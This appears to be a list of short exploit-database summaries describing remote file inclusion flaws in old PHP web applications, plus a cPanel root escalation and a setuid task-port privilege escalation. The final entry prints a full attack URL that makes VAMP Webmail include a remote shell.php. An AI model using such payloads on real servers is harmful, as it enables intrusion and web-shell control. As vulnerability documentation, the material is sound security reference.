JAF CMS version 4.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
Travelsized CMS version 0.4 is affected by a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.
A remote file inclusion vulnerability exists in phpMyProfiler, due to the application including files based on user input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.
JAF CMS version 4.0 RC1 and prior are prone to a remote file-include vulnerability because they fail to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process.
BBaCE v3 (Bulletin Board Ace) is affected by a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to an unsuspecting user. The malicious URL contains a malicious script which is hosted on a remote server. When the user visits the malicious URL, the malicious script is executed on the vulnerable server.
This exploit is used to gain root access on cPanel <= 10.8.x systems. It uses the cpwrap and mysqlwrap binaries to create a malicious strict.pm file, which is then used to compile a setuid root binary. The malicious binary is then executed to gain root access.
BasiliX version 1.1.1 is affected by a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable server.
When a process executes a setuid executable, all existing rights to the task port are invalidated, to make sure unauthorized processes do not retain control of the process. Exception handlers, however, remain installed, and when some kind of hardware exception occurs, the exception handler can receive a new right to the task port as one of its arguments, and thus regain full control over the process. This exploit installs an exception handler on illegal memory access, forks off a child (the handler is inherited), and uses RLIMIT_STACK to cause a segfault after exec(). The shellcode invokes /usr/bin/id.
The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'target' parameter in 'change_preferences2.php', 'create_file.php', 'upload_local.php' and 'upload_multi.php' scripts. A remote attacker can include a file from a remote server and execute arbitrary code on the vulnerable system.
VAMP Webmail is affected by a Remote File Inclusion vulnerability. The vulnerable page is yesno.phtml located in the /setup/ directory. The vulnerable code is <?if($answer=="Yes") { include $yes_url; } else { include $no_url; }?>. An attacker can exploit this vulnerability by sending a malicious URL in the no_url parameter. For example, http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?.